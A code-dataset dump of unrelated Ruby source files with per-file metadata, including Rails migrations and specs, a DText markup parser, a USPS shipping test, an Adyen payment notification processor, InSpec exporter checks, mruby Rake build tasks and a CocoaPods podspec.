hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e94ec75023be6f2fd68f54b98dae25cc6fefc506 | 267 | require 'spec_helper'
# Integration spec: exercises deletion of an API600 C7000 NetworkSet against a
# live OneView appliance; the shared example group contains the actual assertions.
klass = OneviewSDK::API600::C7000::NetworkSet
RSpec.describe klass, integration: true, type: DELETE, sequence: rseq(klass) do
# Client connected to an API version 600 appliance (provided by the suite setup).
let(:current_client) { $client_600 }
include_examples 'NetworkSetDeleteExample', 'integration api600 context'
end
| 33.375 | 79 | 0.782772 |
115e73895dad49365d3b610192aec962305fc2bf | 102 | class FitnessClassCategory < ApplicationRecord
# Join record linking a fitness class to a category (many-to-many through this table).
belongs_to :fitness_class
belongs_to :category
end
| 14.571429 | 46 | 0.843137 |
390338693c1d9cded87e1c54a1a2986dab2a0db1 | 2,623 | # encoding: UTF-8
require 'gooddata'
GoodData.with_connection do |c|
GoodData.with_project('project_id') do |project|
  # Locate a specific tab on a specific dashboard by its identifier.
  t = project.dashboards('dashboard_id').tabs.find { |tab| tab.identifier == 'tab_identifier' }
  # How many items are there on the tab?
  t.items.count
  # The items count also several utility item types. Usually what you are interested in is
  # Reports and filters
  # How many reports are there on the tab?
  t.items.select { |i| i.is_a? GoodData::ReportItem }.count
  # => 6
  # Are there any filters on this tab?
  t.items.any? { |i| i.is_a? GoodData::FilterItem }
  # => false
  # It might be useful to see how many report are on each tab of each dashboard
  project.dashboards.pmapcat { |d| d.tabs.map { |tab| [d.title, tab.title, tab.items.select { |i| i.is_a? GoodData::ReportItem }.count] } }
  # In a similar vein. Which tabs do have any filters on tabs?
  project.dashboards
         .pmapcat { |d| d.tabs.map { |tab| [d.title, tab.title, tab.items.select { |i| i.is_a? GoodData::FilterItem }.count] } }
         .select { |_, _, i| i > 0 }
  # On each item there are properties that you can access.
  # On each type you can access the position and size
  # FIX(review): the original referenced an undefined variable `tab`; the tab
  # found above is bound to `t`.
  item = t.items.find { |i| i.is_a? GoodData::ReportItem }
  item.position_y
  # => 130
  item.size_y
  # => 50
  # With this you can for example find the bottom most element on each page. From this you can
  # find out if there are not any tabs that are too "long". Depends on the usage of the dashboard
  # but if it is an operational dashboard if users need to scroll down it might decrease the
  # usefulness of the particular dashboard.
  #
  # Let's say we would like to find tabs that are longer than 500 pixels
  # FIX(review): the original mixed `{ ... do ... }` block delimiters here and
  # did not parse; rewritten with consistent do/end blocks.
  tuple_with_lowest_item = project.dashboards.pmapcat do |d|
    d.tabs.map do |tab|
      # pick an item whose y position + vertical size is the largest (ie it is lowest on the page)
      [d.title, tab.title, tab.items.max { |a, b| (a.position_y + a.size_y) <=> (b.position_y + b.size_y) }]
    end
  end
  tuple_with_lowest_item
    .map { |d, t2, m| [d, t2, m.position_y + m.size_y] } # Convert it to actual size
    .select { |_, _, d| d > 800 } # Filter those that are larger than a particular threshold
  # With GoodData::ReportItem you can access the underlying report and do whatever is doable with a report
  # For example executing it. Remeber though that the report on the dashboard is executed with additional
  # context like filters etc so the results are not going to be the same.
  puts t.items.find { |i| i.is_a? GoodData::ReportItem }.execute
end
end | 45.224138 | 134 | 0.672512 |
0126b22ba941ec555a3cfaebc6e74b4a9d5e93fd | 135 | require 'spec_helper'
describe ContainerCI do
it 'has a version number' do
expect(ContainerCI::VERSION).not_to be nil
end
end
| 16.875 | 46 | 0.748148 |
f7f86e0de1bb84d9a8688d12dd8a6d22a92de690 | 92 | json.partial! "archive_org_audios/archive_org_audio", archive_org_audio: @archive_org_audio
| 46 | 91 | 0.869565 |
39fe06441de3b02bd5a3198aeb271516d527ff4c | 1,302 | class PopulateAdvisoryCommittees < ActiveRecord::Migration[5.2]
include MigrationHelper
# Migration-local model: decouples this migration from the application's
# AdvisoryCommittee class so future changes to that class cannot break it.
class AdvisoryCommittee < ApplicationRecord
attribute :value, :string
end
# Seeds the AdvisoryCommittee lookup table with the national screening
# programme Research Advisory Committees.
def change
  # One line per committee; ids are assigned in list order starting at 1,
  # matching the original explicit add_lookup calls exactly.
  [
    'NHS Abdominal Aortic Aneurysm (AAA) Programme RAC',
    'NHS Bowel Cancer Screening (BCSP) Programme RAC',
    'NHS Breast Screening (BSP) Programme RAC',
    'NHS Cervical Screening (CSP) Programme RAC',
    'NHS Diabetic Eye Screening (DES) Programme RAC',
    'NHS Fetal Anomaly Screening Programme (FASP) RAC',
    'NHS Infectious Diseases in Pregnancy Screening (IDPS) Programme RAC',
    'NHS Newborn and Infant Physical Examination (NIPE) Screening Programme RAC',
    'NHS Newborn Blood Spot (NBS) Screening Programme RAC',
    'NHS Newborn Hearing Screening Programme (NHSP) RAC',
    'NHS Sickle Cell and Thalassaemia (SCT) Screening Programme RAC'
  ].each.with_index(1) do |committee_name, id|
    add_lookup AdvisoryCommittee, id, value: committee_name
  end
end
end
| 59.181818 | 121 | 0.768817 |
f8f518a5df6e4939fac35693eab8a8d1b110cfd0 | 4,537 | # encoding: utf-8
require "cgi"
require "nokogiri"
# DText: converts Danbooru-style "DText" markup to HTML.
# Parsing is done in two passes: block-level constructs (headers, lists) are
# handled line by line, then inline tags are substituted over the whole text,
# and finally Nokogiri re-parses the result to guarantee well-formed HTML.
module DText
# Converts a DText string to an HTML fragment string. Returns "" for nil.
# NOTE(review): mutates the caller's string in place (strip!/gsub!) before
# reassigning locally — callers should not rely on +str+ afterwards.
def parse(str)
return "" unless str
# Parser state stack shared with parseline/parselist (tracks list nesting).
state = ["newline"]
result = ""
# Normalize newlines.
str.strip!
str.gsub!(/(\r\n?)/, "\n")
str.gsub!(/\n{3,}/, "\n\n")
# Escape user input before any of our own HTML is emitted.
str = CGI.escapeHTML str
# Nuke spaces between newlines.
str.gsub!(/ *\n */, "\n")
# Keep newline, use carriage return for split.
str.gsub!("\n", "\n\r")
data = str.split("\r")
# Parse header and list first, line by line.
data.each do |d|
result << parseline(d, state)
end
# Parse inline tags as a whole.
result = parseinline(result)
# Nokogiri ensures valid html output.
Nokogiri::HTML::DocumentFragment.parse(result).to_html
end
# Substitutes all inline tags ([[wiki]], {{tag search}}, [b]/[i],
# "post #123"-style references, spoilers, quotes and bare URLs) with HTML.
# Operates on — and mutates — the whole already-escaped document at once.
def parseinline(str)
# Short links subtitution:
str.gsub!(/\[\[(.+?)\]\]/) do # [[title]] or [[title|label]] ;link to wiki
data = Regexp.last_match[1].split("|", 2)
title = data[0]
label = data[1].nil? ? title : data[1]
"<a href=\"/wiki/show?title=#{CGI.escape(CGI.unescapeHTML(title.tr(" ", "_")))}\">#{label}</a>"
end
str.gsub!(/\{\{(.+?)\}\}/) do # {{post tags here}} ;search post with tags
"<a href=\"/post?tags=#{CGI.escape(CGI.unescapeHTML(Regexp.last_match[1]))}\">#{Regexp.last_match[1]}</a>"
end
# Miscellaneous single line tags subtitution.
str.gsub! /\[b\](.+?)\[\/b\]/, '<strong>\1</strong>'
str.gsub! /\[i\](.+?)\[\/i\]/, '<em>\1</em>'
str.gsub! /(post #(\d+))/i, '<a href="/post/show/\2">\1</a>'
str.gsub! /(forum #(\d+))/i, '<a href="/forum/show/\2">\1</a>'
str.gsub! /(comment #(\d+))/i, '<a href="/comment/show/\2">\1</a>'
str.gsub! /(pool #(\d+))/i, '<a href="/pool/show/\2">\1</a>'
# Single line spoiler tags.
str.gsub! /\[spoilers?\](.+?)\[\/spoilers?\]/, '<span class="spoiler js-comment--spoiler"><span class="spoilerwarning">spoiler</span></span><span class="spoilertext" style="display: none">\1</span>'
str.gsub! /\[spoilers?=(.+?)\](.+?)\[\/spoilers?\]/, '<span class="spoiler js-comment--spoiler"><span class="spoilerwarning">\1</span></span><span class="spoilertext" style="display: none">\2</span>'
# Multi line spoiler tags.
str.gsub! /\[spoilers?\]/, '<span class="spoiler js-comment--spoiler"><span class="spoilerwarning">spoiler</span></span><div class="spoilertext" style="display: none">'
str.gsub! /\[spoilers?=(.+?)\]/, '<span class="spoiler js-comment--spoiler"><span class="spoilerwarning">\1</span></span><div class="spoilertext" style="display: none">'
str.gsub! /\[\/spoilers?\]/, "</div>"
# Quote.
str.gsub! /\[quote\]/, "<blockquote><div>"
str.gsub! /\[\/quote\]/, "</div></blockquote>"
str = parseurl(str)
# Extraneous newlines before closing div are unnecessary.
str.gsub! /\n+(<\/div>)/, '\1'
# So are after headers, lists, and blockquotes.
str.gsub! /(<\/(ul|h\d+|blockquote)>)\n+/, '\1'
# And after opening blockquote.
str.gsub! /(<blockquote><div>)\n+/, '\1'
# Remaining newlines become explicit line breaks.
str.gsub! /\n/, "<br>"
str
end
# Parses one line of block-level markup: delegates to parselist while a list
# is open (or the line starts with "*"), expands "h1." .. "h6." headers, and
# returns any other line unchanged.
def parseline(str, state)
if state.last =~ /\d/ || str =~ /^\*+\s+/
parselist str, state
elsif str =~ /^(h[1-6])\.\s*(.+)\n*/
"<#{Regexp.last_match[1]}>#{Regexp.last_match[2]}</#{Regexp.last_match[1]}>"
else
str
end
end
# Converts "*"-bulleted lines into nested <ul>/<li> markup. +state+ carries
# the current nesting depth (numeric string on top of the stack) between
# calls; a non-bullet line pops that state and closes the list.
def parselist(str, state)
html = ""
if state.last =~ /\d/
# Number of leading "*" characters is the requested nesting depth.
n = ((str =~ /^\*+\s+/ && str.split[0]) || "").count("*")
if n < state.last.to_i
html << "</ul>" * (state.last.to_i - n)
state[-1] = n.to_s
elsif n > state.last.to_i
html << "<ul>"
state[-1] = (state.last.to_i + 1).to_s
end
unless str =~ /^\*+\s+/
# Not a bullet line: leave list mode and re-parse it normally.
state.pop
return html + parseline(str, state)
end
else
state.push "1"
html << "<ul>"
end
html << str.gsub(/\*+\s+(.+)\n*/, '<li>\1')
end
# Autolinks plain URLs plus the <<url>>, <<url|label>> and "label":url forms.
# Mutates and returns +str+.
def parseurl(str)
# url
str.gsub! %r{(^|[\s\(>])(h?ttps?://(?:(?!>>)[^\s<"])+[^\s<".])}, '\1<a href="\2">\2</a>'
# <<url|label>>
str.gsub! %r{<<(h?ttps?://(?:(?!>>).)+)\|((?:(?!>>).)+)>>}, '<a href="\1">\2</a>'
# <<url>>
str.gsub! %r{<<(h?ttps?:\/\/(?:(?!>>).)+)>>}, '<a href="\1">\1</a>'
# "label":url
str.gsub! %r{(^|[\s>])"((?:(?!").)+)":(h?ttps?://[^\s<"]+[^\s<".])}, '\1<a href="\3">\2</a>'
# Fix ttp(s) scheme
str.gsub! /<a href="ttp/, '<a href="http'
str
end
module_function :parse, :parseline, :parseinline, :parselist, :parseurl
end
| 34.112782 | 203 | 0.529645 |
d5783fc96abe272193ad5b1450bf0ac26daba91d | 1,460 | require "rails_helper"
# Request specs for the HTTP Basic-auth protected internal events area:
# bad/missing credentials are rejected, and valid credentials set the
# session user with the role encoded in the configured credential string.
describe InternalController, type: :request do
let(:publisher_username) { "publisher_username" }
let(:publisher_password) { "publisher_password" }
let(:author_username) { "author_username" }
let(:author_password) { "author_password" }
before do
# Reset BasicAuth's cached credentials so the stubbed config below is re-read.
BasicAuth.class_variable_set(:@@credentials, nil)
allow_any_instance_of(GetIntoTeachingApiClient::TeachingEventsApi)
.to receive(:search_teaching_events_grouped_by_type).and_return([])
# Credential format: "user|password|role" entries separated by commas.
allow(Rails.application.config.x).to receive(:http_auth) do
"#{publisher_username}|#{publisher_password}|publisher,#{author_username}|#{author_password}|author"
end
end
it "rejects unauthenticated users" do
get internal_events_path, headers: generate_auth_headers(:bad_credentials)
assert_response :unauthorized
end
it "rejects no authentication" do
get internal_events_path
assert_response :unauthorized
end
it "sets the account role of publishers" do
get internal_events_path, headers: generate_auth_headers(:publisher)
expect(session[:user].username).to eq(publisher_username)
expect(session[:user].publisher?).to be true
assert_response :success
end
it "sets the account role of authors" do
get internal_events_path, headers: generate_auth_headers(:author)
expect(session[:user].username).to eq(author_username)
expect(session[:user].author?).to be true
assert_response :success
end
end
| 30.416667 | 106 | 0.755479 |
5da559d237020e71a11006dfaa3b26ca602bf568 | 158 | class RestrictionListType < ActiveModel::Type::Value
# Casts each raw restriction in +value+ through RestrictionType and returns
# the results as a frozen Array.
def cast(value)
  restrictions = value.map do |raw_restriction|
    RestrictionType.new.cast(raw_restriction)
  end
  restrictions.freeze
end
end
| 26.333333 | 76 | 0.759494 |
620ca7528987384e741c64f02c9e0d40f2c3c33b | 7,303 | require File.dirname(__FILE__) + '/../../test_helper'
class USPSTest < Test::Unit::TestCase
# Shared fixtures: packages/locations from TestFixtures, a USPS carrier built
# with a dummy login, and a canned international rate response XML fixture.
def setup
@packages = TestFixtures.packages
@locations = TestFixtures.locations
@carrier = USPS.new(:login => 'login')
@international_rate_responses = {
:vanilla => xml_fixture('usps/beverly_hills_to_ottawa_book_rate_response')
}
end
# TODO: test_parse_domestic_rate_response
# TODO: test_build_us_rate_request
# TODO: test_build_world_rate_request
# USPS requires a :login option; construction without it must raise.
def test_initialize_options_requirements
assert_raises ArgumentError do USPS.new end
assert_nothing_raised { USPS.new(:login => 'blah')}
end
# With commit stubbed to return the fixture XML, find_rates must surface the
# raw XML unchanged and parse rates sorted by price with the expected
# service codes, names and totals.
def test_parse_international_rate_response
fixture_xml = @international_rate_responses[:vanilla]
@carrier.expects(:commit).returns(fixture_xml)
response = begin
@carrier.find_rates(
@locations[:beverly_hills], # imperial (U.S. origin)
@locations[:ottawa],
@packages[:book],
:test => true
)
rescue ResponseError => e
e.response
end
expected_xml_hash = Hash.from_xml(fixture_xml)
actual_xml_hash = Hash.from_xml(response.xml)
assert_equal expected_xml_hash, actual_xml_hash
assert_not_equal [],response.rates
# Rates must already come back ordered cheapest-first.
assert_equal response.rates.sort_by(&:price), response.rates
assert_equal ["1", "2", "3", "4", "6", "7", "9"], response.rates.map(&:service_code).sort
ordered_service_names = ["USPS Express Mail International (EMS)", "USPS First-Class Mail International", "USPS Global Express Guaranteed", "USPS Global Express Guaranteed Non-Document Non-Rectangular", "USPS Global Express Guaranteed Non-Document Rectangular", "USPS Priority Mail International", "USPS Priority Mail International Flat Rate Box"]
assert_equal ordered_service_names, response.rates.map(&:service_name).sort
assert_equal [376, 1600, 2300, 2325, 4100, 4100, 4100], response.rates.map(&:total_price)
end
# Verifies that the free-text "max dimensions" sentences USPS returns are
# parsed into the numeric limit hashes passed to
# package_valid_for_max_dimensions (asserted via mocha expectations).
def test_parse_max_dimension_sentences
limits = {
"Max. length 46\", width 35\", height 46\" and max. length plus girth 108\"" =>
[{:length => 46.0, :width => 46.0, :height => 35.0, :length_plus_girth => 108.0}],
"Max.length 42\", max. length plus girth 79\"" =>
[{:length => 42.0, :length_plus_girth => 79.0}],
"9 1/2\" X 12 1/2\"" =>
[{:length => 12.5, :width => 9.5, :height => 0.75}, "Flat Rate Envelope"],
"Maximum length and girth combined 108\"" =>
[{:length_plus_girth => 108.0}],
"USPS-supplied Priority Mail flat-rate envelope 9 1/2\" x 12 1/2.\" Maximum weight 4 pounds." =>
[{:length => 12.5, :width => 9.5, :height => 0.75}, "Flat Rate Envelope"],
"Max. length 24\", Max. length, height, depth combined 36\"" =>
[{:length => 24.0, :length_plus_width_plus_height => 36.0}]
}
p = @packages[:book]
limits.each do |sentence,hashes|
# hashes[0] holds the expected numeric limits, hashes[1] an optional service name.
dimensions = hashes[0].update(:weight => 50.0)
service_node = build_service_node(
:name => hashes[1],
:max_weight => 50,
:max_dimensions => sentence )
@carrier.expects(:package_valid_for_max_dimensions).with(p, dimensions)
@carrier.send(:package_valid_for_service, p, service_node)
end
service_node = build_service_node(
:name => "flat-rate box",
:max_weight => 50,
:max_dimensions => "USPS-supplied Priority Mail flat-rate box. Maximum weight 20 pounds." )
# should test against either kind of flat rate box:
dimensions = [{:weight => 50.0, :length => 11.0, :width => 8.5, :height => 5.5}, # or...
{:weight => 50.0, :length => 13.625, :width => 11.875, :height => 3.375}]
@carrier.expects(:package_valid_for_max_dimensions).with(p, dimensions[0])
@carrier.expects(:package_valid_for_max_dimensions).with(p, dimensions[1])
@carrier.send(:package_valid_for_service, p, service_node)
end
# A package exactly at every limit passes; shrinking any single limit by one
# inch/pound makes validation fail.
def test_package_valid_for_max_dimensions
p = Package.new(70 * 16, [10,10,10], :units => :imperial)
limits = {:weight => 70.0, :length => 10.0, :width => 10.0, :height => 10.0, :length_plus_girth => 50.0, :length_plus_width_plus_height => 30.0}
assert_equal true, @carrier.send(:package_valid_for_max_dimensions, p, limits)
limits.keys.each do |key|
dimensions = {key => (limits[key] - 1)}
assert_equal false, @carrier.send(:package_valid_for_max_dimensions, p, dimensions)
end
end
# Rate requests must send 5-digit ZIP codes: ZIP+4 ("90210-1234") and bare
# 9-digit ("123456789") inputs are truncated before being put in the XML.
def test_strip_9_digit_zip_codes
  # FIX(review): URI.decode was deprecated in Ruby 2.7 and removed in 3.0;
  # URI::DEFAULT_PARSER.unescape performs the same percent-decoding.
  request = URI::DEFAULT_PARSER.unescape(@carrier.send(:build_us_rate_request, @packages[:book], "90210-1234", "123456789"))
  assert !(request =~ /\>90210-1234\</)
  assert request =~ /\>90210\</
  assert !(request =~ /\>123456789\</)
  assert request =~ /\>12345\</
end
# Issues two identical rate lookups with commit stubbed (expected exactly
# twice); exercises the request/response logging path without hitting USPS.
def test_xml_logging_to_file
mock_response = @international_rate_responses[:vanilla]
@carrier.expects(:commit).times(2).returns(mock_response)
@carrier.find_rates(
@locations[:beverly_hills],
@locations[:ottawa],
@packages[:book],
:test => true
)
@carrier.find_rates(
@locations[:beverly_hills],
@locations[:ottawa],
@packages[:book],
:test => true
)
end
# USPS maximum weight is 70 lbs; Package mass is expressed in ounces (70 * 16).
def test_maximum_weight
  # FIX(review): bare `assert x == y` / `assert x > y` produce unhelpful
  # failure messages; assert_equal/assert_operator report both operands.
  assert_equal @carrier.maximum_weight, Package.new(70 * 16, [5,5,5], :units => :imperial).mass
  assert_operator Package.new((70 * 16) + 0.01, [5,5,5], :units => :imperial).mass, :>, @carrier.maximum_weight
  assert_operator Package.new((70 * 16) - 0.01, [5,5,5], :units => :imperial).mass, :<, @carrier.maximum_weight
end
private
# Builds an XML <Service> element mirroring a USPS rate response entry;
# individual fields can be overridden via +options+, otherwise defaults
# describe a typical First-Class Mail International service.
def build_service_node(options = {})
XmlNode.new('Service') do |service_node|
service_node << XmlNode.new('Pounds', options[:pounds] || "0")
service_node << XmlNode.new('SvcCommitments', options[:svc_commitments] || "Varies")
service_node << XmlNode.new('Country', options[:country] || "CANADA")
service_node << XmlNode.new('ID', options[:id] || "3")
service_node << XmlNode.new('MaxWeight', options[:max_weight] || "64")
service_node << XmlNode.new('SvcDescription', options[:name] || "First-Class Mail International")
service_node << XmlNode.new('MailType', options[:mail_type] || "Package")
service_node << XmlNode.new('Postage', options[:postage] || "3.76")
service_node << XmlNode.new('Ounces', options[:ounces] || "9")
service_node << XmlNode.new('MaxDimensions', options[:max_dimensions] ||
"Max. length 24\", Max. length, height, depth combined 36\"")
end.to_xml_element
end
# Builds the Hash representation of a USPS <Service> response element.
# Entries in +options+ (e.g. :pounds, :country) override the defaults, which
# describe a typical First-Class Mail International service.
def build_service_hash(options = {})
  # Map each USPS field name to [option key, default]; insertion order matches
  # the original literal so the resulting hash is identical.
  fields = {
    "Pounds" => [:pounds, "0"],
    "SvcCommitments" => [:svc_commitments, "Varies"],
    "Country" => [:country, "CANADA"],
    "ID" => [:id, "3"],
    "MaxWeight" => [:max_weight, "64"],
    "SvcDescription" => [:name, "First-Class Mail International"],
    "MailType" => [:mail_type, "Package"],
    "Postage" => [:postage, "3.76"],
    "Ounces" => [:ounces, "9"],
    "MaxDimensions" => [:max_dimensions,
                        "Max. length 24\", Max. length, height, depth combined 36\""]
  }
  fields.each_with_object({}) do |(field, (key, default)), hash|
    hash[field] = options[key] || default
  end
end
end | 42.958824 | 350 | 0.630837 |
6a144b394a9403304b59244a6edecce1d8f361b9 | 4,830 | module Spree
module Adyen
# Class responsible for taking in a notification from Adyen and applying
# some form of modification to the associated payment.
#
# I would in the future like to refactor this by breaking this into
# separate classes that are only aware of how to process specific kinds of
# notifications (auth, capture, refund, etc.).
class NotificationProcessor
attr_accessor :notification, :payment, :order
# +notification+ is the Adyen notification record; +payment+ may be supplied
# explicitly, otherwise it is looked up from the notification.
def initialize(notification, payment = nil)
self.notification = notification
self.order = notification.order
self.payment = payment ? payment : notification.payment
end
# for the given payment, process all notifications that are currently
# unprocessed in the order that they were dispatched.
def self.process_outstanding!(payment)
payment.
source.
notifications(true). # bypass caching
unprocessed.
as_dispatched.
map do |notification|
new(notification, payment).process!
end
end
# only process the notification if there is a matching payment there's a
# number of reasons why there may not be a matching payment such as test
# notifications, reports etc, we just log them and then accept
def process!
return notification if order.nil?
# Lock the order row so concurrently delivered notifications cannot interleave.
order.with_lock do
if should_create_payment?
self.payment = create_missing_payment
end
if !notification.success?
handle_failure
elsif notification.modification_event?
handle_modification_event
elsif notification.normal_event?
handle_normal_event
end
end
return notification
end
private
# Marks the notification processed; transitions the payment to failed unless
# it is missing or already completed.
def handle_failure
notification.processed!
# ignore failures if the payment was already completed, or if it doesn't
# exist
return if payment.nil? || payment.completed?
# might have to do something else on modification events,
# namely refunds
payment.failure!
end
# Handles capture / cancel-or-refund / refund modification events by moving
# the payment through the corresponding state change.
def handle_modification_event
if notification.capture?
notification.processed!
complete_payment!
elsif notification.cancel_or_refund?
notification.processed!
payment.void
elsif notification.refund?
payment.refunds.create!(
amount: notification.value / 100.0, # cents to dollars
transaction_id: notification.psp_reference,
refund_reason_id: ::Spree::RefundReason.first.id # FIXME
)
# payment was processing, move back to completed
payment.complete! unless payment.completed?
notification.processed!
end
end
# normal event is defined as just AUTHORISATION
def handle_normal_event
# Payment may not have psp_reference. Add this from notification if it
# doesn't have one.
unless self.payment.response_code
payment.response_code = notification.psp_reference
payment.save
end
if notification.auto_captured?
complete_payment!
else
payment.capture!
end
notification.processed!
end
# Records a capture event for the notified amount and completes the payment.
def complete_payment!
money = ::Money.new(notification.value, notification.currency)
# this is copied from Spree::Payment::Processing#capture
payment.capture_events.create!(amount: money.to_f)
payment.update!(amount: payment.captured_amount)
payment.complete!
end
# At this point the auth was received before the redirect, we create
# the payment here with the information we have available so that if
# the user is not redirected to back for some reason we still have a
# record of the payment.
def create_missing_payment
order = notification.order
source = Spree::Adyen::HppSource.new(
auth_result: "unknown",
order: order,
payment_method: notification.payment_method,
psp_reference: notification.psp_reference
)
payment = order.payments.create!(
amount: notification.money.dollars,
# We have no idea what payment method they used, this will be
# updated when/if they get redirected
payment_method: Spree::Gateway::AdyenHPP.last,
response_code: notification.psp_reference,
source: source,
order: order
)
order.contents.advance
order.complete
payment
end
# Create a payment only for successful authorisations on a known order that
# has no payment yet.
def should_create_payment?
notification.authorisation? &&
notification.success? &&
notification.order.present? &&
payment.nil?
end
end
end
end
| 30.961538 | 80 | 0.637888 |
5deac9b2d2c567ab62c8fc49b7c6b59c38801dfc | 1,206 | # encoding: utf-8
# author: Mesaguy
# The "active" symlink selects which installed release of the exporter runs.
describe file('/opt/prometheus/exporters/clickhouse_exporter_perconalab/active') do
it { should be_symlink }
its('mode') { should cmp '0755' }
its('owner') { should eq 'root' }
its('group') { should eq 'prometheus' }
end
# The exporter binary behind the symlink must exist and be executable.
describe file('/opt/prometheus/exporters/clickhouse_exporter_perconalab/active/clickhouse_exporter') do
it { should be_file }
it { should be_executable }
its('mode') { should cmp '0755' }
its('owner') { should eq 'root' }
its('group') { should eq 'prometheus' }
end
# The service must be installed, enabled at boot and currently running.
describe service('clickhouse_exporter_perconalab') do
it { should be_enabled }
it { should be_installed }
it { should be_running }
end
# Exactly one exporter process, launched from a versioned release directory,
# running as the 'prometheus' user.
describe processes(Regexp.new("^/opt/prometheus/exporters/clickhouse_exporter_perconalab/(v)?([0-9.]+|[0-9.]+__go-[0-9.]+)/clickhouse_exporter")) do
it { should exist }
its('entries.length') { should eq 1 }
its('users') { should include 'prometheus' }
end
# The metrics endpoint must be listening and serving exporter metrics.
describe port(9363) do
it { should be_listening }
end
describe http('http://127.0.0.1:9363/metrics') do
its('status') { should cmp 200 }
its('body') { should match /clickhouse_exporter_scrape_failures_total/ }
end
| 30.923077 | 148 | 0.685738 |
1d3ebdcdc3275de8b3200e73b35ef8e5f1331098 | 1,394 | def gen_build_config
cp "#{ENV['MRUBY_HOME']}/build_config.rb", './build_config.rb'
end
# Resolve the MRuby checkout and build config, aborting if none can be found.
unless ENV['MRUBY_HOME']
  # Maybe MRuby is next to this gem?
  ENV['MRUBY_HOME'] ||= Dir.pwd + '/../mruby'
end
# Still no luck? Raise hell!
if !ENV['MRUBY_HOME'] || !File.directory?(ENV['MRUBY_HOME'])
  $stderr.puts 'Unable to find MRuby. Please set $MRUBY_HOME.'
  exit 1
end
# When calling mruby rake tasks, use the local build_config.rb
ENV['MRUBY_CONFIG'] ||= Dir.pwd + '/build_config.rb'
# FIX(review): File.exists? was deprecated and removed in Ruby 3.2; use File.exist?.
gen_build_config unless File.exist?(ENV['MRUBY_CONFIG'])
# Rake tasks that drive the upstream MRuby build from this project, keeping a
# local ./build copy of the produced binaries and libraries.
namespace :mruby do
desc 'Clean the mruby build artifacts'
task :clean do
# Drop the local artifact copy before cleaning upstream.
if File.directory?('build')
rm_rf 'build'
end
cd ENV['MRUBY_HOME'] {
sh 'rake clean'
}
end
desc 'Deep clean mruby build artifacts and gems'
task :deep_clean do
if File.directory?('build')
rm_rf 'build'
end
cd ENV['MRUBY_HOME'] {
sh 'rake deep_clean'
}
end
desc 'Build mruby with the local build_config'
task :build do
# Always rebuild the local artifact directory from scratch.
if File.directory?('build')
rm_rf 'build'
end
mkdir 'build'
cd ENV['MRUBY_HOME'] {
sh 'rake default'
}
# Copy the host-target binaries and libraries produced by mruby into ./build.
cp_r Dir["#{ENV['MRUBY_HOME']}/build/host/{bin,lib}"], 'build'
end
namespace :gen do
desc 'Copies $MRUBY_HOME/build_config.rb into this project'
task :build_config do
gen_build_config
end
end
end
| 22.483871 | 73 | 0.648494 |
2670bc1088700cb6038cf6c7da301e88a576c8d7 | 2,776 | class AllowRevisionDeletion < ActiveRecord::Migration[5.2]
# Re-create the image/file-attachment foreign keys so deleting a revision
# cascades to its join rows and blob revisions, while asset "superseded by"
# self-references are nulled out instead of blocking deletion.
def up
remove_foreign_key :revisions_image_revisions, :revisions
add_foreign_key :revisions_image_revisions,
:revisions,
on_delete: :cascade
remove_foreign_key :image_assets, :image_blob_revisions
add_foreign_key :image_assets,
:image_blob_revisions,
column: :blob_revision_id,
on_delete: :cascade
remove_foreign_key :image_assets, :image_assets
add_foreign_key :image_assets,
:image_assets,
column: :superseded_by_id,
on_delete: :nullify
remove_foreign_key :revisions_file_attachment_revisions, :revisions
add_foreign_key :revisions_file_attachment_revisions,
:revisions,
on_delete: :cascade
remove_foreign_key :file_attachment_assets, :file_attachment_blob_revisions
add_foreign_key :file_attachment_assets,
:file_attachment_blob_revisions,
column: :blob_revision_id,
on_delete: :cascade
remove_foreign_key :file_attachment_assets, :file_attachment_assets
add_foreign_key :file_attachment_assets,
:file_attachment_assets,
column: :superseded_by_id,
on_delete: :nullify
end
# Restore the original restrictive (ON DELETE RESTRICT) foreign keys.
def down
remove_foreign_key :revisions_image_revisions, :revisions
add_foreign_key :revisions_image_revisions,
:revisions,
on_delete: :restrict
remove_foreign_key :image_assets, :image_blob_revisions
add_foreign_key :image_assets,
:image_blob_revisions,
column: :blob_revision_id,
on_delete: :restrict
remove_foreign_key :image_assets, :image_assets
add_foreign_key :image_assets,
:image_assets,
column: :superseded_by_id,
on_delete: :restrict
remove_foreign_key :revisions_file_attachment_revisions, :revisions
add_foreign_key :revisions_file_attachment_revisions,
:revisions,
on_delete: :restrict
remove_foreign_key :file_attachment_assets, :file_attachment_blob_revisions
add_foreign_key :file_attachment_assets,
:file_attachment_blob_revisions,
column: :blob_revision_id,
on_delete: :restrict
remove_foreign_key :file_attachment_assets, :file_attachment_assets
add_foreign_key :file_attachment_assets,
:file_attachment_assets,
column: :superseded_by_id,
on_delete: :restrict
end
end
| 37.513514 | 79 | 0.634006 |
335bdf9957ab0dc9d699e2bc8b8377c006441c3a | 1,781 | #
# Be sure to run `pod lib lint QBase.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
# CocoaPods specification for the QBase pod (iOS 8.0+).
Pod::Spec.new do |s|
s.name = 'QBase'
s.version = '1.0.1'
s.summary = 'QBase.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = "A short description of QBase"
s.homepage = 'https://github.com/xuekey/QBase'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'xuekey' => '[email protected]' }
s.source = { :git => 'https://github.com/xuekey/QBase.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
#s.source_files = 'QBase/Classes/**/*'
# Subspecs let consumers depend on Base alone without the Category
# extensions, which pull in SDWebImage.
s.subspec 'Base' do |b|
b.source_files = 'QBase/Classes/Base/**/*'
end
s.subspec 'Category' do |c|
c.source_files = 'QBase/Classes/Category/**/*'
c.dependency 'SDWebImage'
end
#s.subspec 'Network' do |n|
# n.source_files = 'TZSoundBase/Classes/Network/**/*'
# n.dependency 'AFNetworking'
#end
# s.resource_bundles = {
# 'QBase' => ['QBase/Assets/*.png']
# }
